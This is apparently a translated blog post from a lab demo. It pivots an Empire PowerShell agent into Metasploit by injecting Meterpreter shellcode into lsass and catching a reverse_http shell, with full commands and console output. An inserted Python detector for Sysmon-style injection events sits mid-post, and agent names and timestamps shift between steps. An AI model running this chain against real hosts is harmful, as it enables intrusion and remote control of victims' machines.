After getting in with Empire, I want to move from the PC I have a session on to the server.
In reality you would grind it out with a keylogger and the like, but for a demo it looks much cooler to exploit a vulnerability and get in right away.
The problem is whether the tools can actually be used from the compromised Windows PC.
To widen the range of usable tools, I tried verifying that Empire can hand the baton over to Metasploit.
The gotcha was the Metasploit version.
With 4.16.13, the session died the moment it was handed over. Upgrading to 4.16.26 fixed it.
Incidentally, the Empire version is 2.3.
First, establish a session with Empire as usual.
(Empire: listeners) >
(Empire: stager/windows/launcher_lnk) > execute
[*] Stager output written out to: clickme.lnk
(Empire: stager/windows/launcher_lnk) >
[+] Initial agent 4SVP6M9W from 10.0.2.5 now active (Slack)
(Empire: stager/windows/launcher_lnk) > agents

[*] Active agents:

  Name      Lang  Internal IP  Machine Name  Username        Process          Delay  Last Seen
  --------- ----  -----------  ------------  ---------       -------          -----  --------------------
  4SVP6M9W  ps    10.0.2.5     OSAKANA       *osakana/n-lab  powershell/2800  5/0.0  2018-01-20 11:47:28

(Empire: agents) > rename 4SVP6M9W WIN7
(Empire: agents) > interact WIN7
(Empire: WIN7) > back
Next, create another listener. Let's name it "change-metasp".
By setting this listener up in meterpreter mode, the session can be tossed over to Meterpreter.
(Empire: listeners) > uselistener meterpreter
(Empire: listeners/meterpreter) > set Name change-metasp
(Empire: listeners/meterpreter) > set Port 8000
(Empire: listeners/meterpreter) > info

    Name: Meterpreter
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a 'foreign' http[s] Meterpreter listener.

Meterpreter Options:

  Name  Required  Value                  Description
  ----  --------  -------                -----------
  Host  True      http://10.0.2.15:8000  Hostname/IP for staging.
  Name  True      change-metasp          Name for the listener.
  Port  True      8000                   Port for the listener.

(Empire: listeners/meterpreter) > execute
[*] Starting listener 'change-metasp'
[+] Listener successfully started!
Next, specify the process that Meterpreter will be injected into.
(Empire: listeners/http) > agents

[*] Active agents:

  Name      Lang  Internal IP  Machine Name  Username        Process          Delay  Last Seen
  --------- ----  -----------  ------------  ---------       -------          -----  --------------------
  A21TR6ZE  ps    10.0.2.5     OSAKANA       *osakana\n-lab  powershell/1068  5/0.0  2018-01-19 21:46:08

(Empire: agents) > interact A21TR6ZE
(Empire: A21TR6ZE) > getpid
(Empire: A21TR6ZE) >
Handles  NPM(K)  PM(K)  WS(K)  CPU(s)  Id    SI  ProcessName
-------  ------  -----  -----  ------  --    --  -----------
    379      32  59524  69324    4.02  1068   1  powershell

(Empire: A21TR6ZE) > ps
(Empire: A21TR6ZE) >
ProcessName  PID   Arch  UserName                      MemUsage
-----------  ---   ----  --------                      --------
Idle         0     x64   N/A                           0.02 MB
System       4     x64   N/A                           0.74 MB
smss         256   x64   NT AUTHORITY\SYSTEM           1.05 MB
svchost      276   x64   NT AUTHORITY\LOCAL SERVICE    14.74 MB
csrss        332   x64   NT AUTHORITY\SYSTEM           5.45 MB
csrss        368   x64   NT AUTHORITY\SYSTEM           12.19 MB
wininit      376   x64   NT AUTHORITY\SYSTEM           5.49 MB
winlogon     404   x64   NT AUTHORITY\SYSTEM           7.71 MB
services     464   x64   NT AUTHORITY\SYSTEM           8.77 MB
lsass        472   x64   NT AUTHORITY\SYSTEM           10.38 MB
svchost      476   x64   NT AUTHORITY\NETWORK SERVICE  15.84 MB
powershell   1068  x64   osakana\n-lab                 71.18 MB

(Empire: A21TR6ZE) > injectshellcode change-metasp 472
(Empire: powershell/code_execution/invoke_shellcode) >
The module info, showing that "change-metasp" will be injected into process 472.
(Empire: powershell/code_execution/invoke_shellcode) > info

              Name: Invoke-Shellcode
            Module: powershell/code_execution/invoke_shellcode
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None

Authors:
  @mattifestation

Description:
  Uses PowerSploit's Invoke--Shellcode to inject shellcode into the
  process ID of your choosing or within the context of the running
  PowerShell process. If you're injecting custom shellcode, make sure
  it's in the correct format and matches the architecture of the
  process you're injecting into.

Comments:
  http://www.exploit-monday.com
  https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1

Options:

  Name       Required  Value          Description
  ----       --------  -------        -----------
  ProcessID  False     472            Process ID of the process you want to inject shellcode into.
  Lhost      False                    Local host handler for the meterpreter shell.
  Agent      True      WIN7           Agent to run module on.
  Listener   False     change-metasp  Meterpreter/Beacon listener name.
  Lport      False                    Local port of the host handler.
  Shellcode  False                    Custom shellcode to inject, 0xaa,0xab,... format.
  Payload    False     reverse_https  Metasploit payload to inject (reverse_http[s]).

(Empire: powershell/code_execution/invoke_shellcode) > set Payload reverse_http
Only the payload is changed, to reverse_http. Metasploit will be started on the same machine, so Lhost is left empty.
Next, the Metasploit side.
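The step configured above, a PowerShell agent (PID 1068 in the process list) writing Meterpreter shellcode into PID 472, which the same list shows is lsass, is exactly the event a defender wants to catch. The following checker is an added example and is not part of the original post, nor of Empire, PowerSploit or Metasploit. It runs over a few constructed records shaped like Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess), using Sysmon's real field names (SourceImage, TargetImage, GrantedAccess); the record values, the list of scripting hosts and the sensitive-target list are all my assumptions, and the PIDs simply mirror the post's lab.

```python
"""Flag cross-process injection by scripting hosts in Sysmon-style events.

Added example. The sample records are constructed to resemble Sysmon
Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess);
they are not real logs from the post's lab.
"""
from typing import Dict, List, Optional, Tuple

# Assumption: interpreters that normally have no business touching other
# processes' memory. Extend for your environment.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe"}
# Assumption: targets where injection is most damaging (credential store,
# logon and service control managers).
SENSITIVE_TARGETS = {"lsass.exe", "winlogon.exe", "services.exe", "csrss.exe"}

# Windows PROCESS_* access rights an injector needs on its target handle.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE  # 0x2A


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return 'high', 'medium' or None for one Sysmon-style record."""
    src = basename(event.get("SourceImage", ""))
    dst = basename(event.get("TargetImage", ""))
    if src not in SCRIPT_HOSTS or src == dst:
        return None
    eid = int(event["EventID"])
    if eid == 8:
        # A remote thread from a scripting host into any other process is
        # suspicious; into a sensitive process it is the pattern on this page.
        return "high" if dst in SENSITIVE_TARGETS else "medium"
    if eid == 10:
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        # Query-only handles (e.g. 0x1000) are common and benign; only a
        # handle carrying all three injection rights is interesting.
        if (granted & INJECT_MASK) != INJECT_MASK:
            return None
        return "high" if dst in SENSITIVE_TARGETS else "medium"
    return None


Alert = Tuple[str, int, str, str, str]  # severity, event id, source, target, target pid


def detect(events: List[Dict[str, str]]) -> List[Alert]:
    """Run classify() over a batch of records and collect the hits."""
    alerts: List[Alert] = []
    for ev in events:
        sev = classify(ev)
        if sev:
            alerts.append((sev, int(ev["EventID"]), basename(ev["SourceImage"]),
                           basename(ev["TargetImage"]), ev.get("TargetProcessId", "?")))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"

# Constructed sample batch (assumed values, PIDs mirror the post's lab).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "10", "SourceImage": PS, "SourceProcessId": "1068",
     "TargetImage": SYS32 + r"\lsass.exe", "TargetProcessId": "472",
     "GrantedAccess": "0x1FFFFF"},                       # full access handle
    {"EventID": "8", "SourceImage": PS, "SourceProcessId": "1068",
     "TargetImage": SYS32 + r"\lsass.exe", "TargetProcessId": "472"},
    {"EventID": "10", "SourceImage": SYS32 + r"\svchost.exe", "SourceProcessId": "476",
     "TargetImage": SYS32 + r"\lsass.exe", "TargetProcessId": "472",
     "GrantedAccess": "0x1000"},                         # query-only, benign
    {"EventID": "8", "SourceImage": r"C:\Windows\explorer.exe", "SourceProcessId": "900",
     "TargetImage": SYS32 + r"\notepad.exe", "TargetProcessId": "2400"},
    {"EventID": "10", "SourceImage": PS, "SourceProcessId": "1068",
     "TargetImage": SYS32 + r"\notepad.exe", "TargetProcessId": "2400",
     "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for sev, eid, src, dst, pid in detect(SAMPLE_EVENTS):
        print(f"[{sev}] EID {eid}: {src} -> {dst} (pid {pid})")
```

The two lsass records come out as high and the PowerShell-to-notepad handle as medium, while the svchost query handle and the explorer thread are ignored. In a real pipeline the GrantedAccess threshold and the host lists are what you tune; the structure of the check stays the same.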
msf > use exploit/multi/handler
msf exploit(handler) > set paylad windows/meterpreter/reverse_http
paylad => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(handler) > set LPORT 8000
LPORT => 8000
msf exploit(handler) > setg exitonsession false
exitonsession => false
msf exploit(handler) > set

Global
======

  Name           Value
  ----           -----
  exitonsession  false

Module: multi/handler
=====================

  Name                    Value
  ----                    -----
  ContextInformationFile
  DisablePayloadHandler   false
  EnableContextEncoding   false
  ExitOnSession           false
  LHOST                   10.0.2.15
  LPORT                   8000
  ListenerTimeout         0
  VERBOSE                 false
  WORKSPACE
  paylad                  windows/meterpreter/reverse_http

msf exploit(handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.0.2.15:8000
Back in Empire, execute the module.
(Empire: powershell/code_execution/invoke_shellcode) > execute
Job started: 9C81LK
A session with Metasploit is then established.
msf exploit(multi/handler) >
[*] http://10.0.2.15:8000 handling request from 10.0.2.5; (UUID: 67ehyyi0) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (10.0.2.15:8000 -> 10.0.2.5:49375) at 2018-01-20 13:49:34 +0900
sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/windows               10.0.2.15:8000 -> 10.0.2.5:49375 (10.0.2.5)

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
But then it complains that it has never heard of "sysinfo". Why...